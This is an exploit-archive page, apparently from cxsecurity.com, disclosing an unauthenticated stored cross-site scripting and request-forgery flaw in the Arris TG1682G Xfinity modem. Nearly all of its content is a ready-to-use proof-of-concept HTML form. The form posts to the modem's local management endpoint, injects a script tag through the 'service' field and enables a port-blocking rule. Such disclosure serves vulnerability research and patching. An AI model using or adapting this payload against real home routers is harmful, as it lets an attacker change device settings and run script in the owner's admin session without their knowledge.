Arris TG1682G Modem Cross Site Scripting

2015.11.10
Credit: Nu11By73
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

<!-- # Exploit Title: Unauthenticated Stored Xss # Date: 11/6/15 # Exploit Author: Nu11By73 # Vendor Homepage: comcast.net and arrisi.com # Version: eMTA & DOCSIS Software Version: 10.0.59.SIP.PC20.CT Software Image Name:TG1682_2.0s7_PRODse Advanced Services:TG1682G Packet Cable:2.0 # Tested on: Default Install --> <html> <p>Unauth Stored CSRF/XSS - Xfinity Modem</p> <form method="POST" action="http://192.168.0.1/actionHandler/ajax_managed_services.php"> <input type="hidden" name="set" value="true" /> <input type="hidden" name="UMSStatus" value="Enabled" /> <input type="hidden" name="add" value="true" /> <input type="hidden" name="service" value="test><script>alert(1)</script>" / > <input type="hidden" name="protocol" value="TCP" / > <input type="hidden" name="startPort" value="1" /> <input type="hidden" name="endPort" value="2" /> <input type="hidden" name="block" value="true" /> <input type="submit" title="Enable Service" /> </form> </html>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top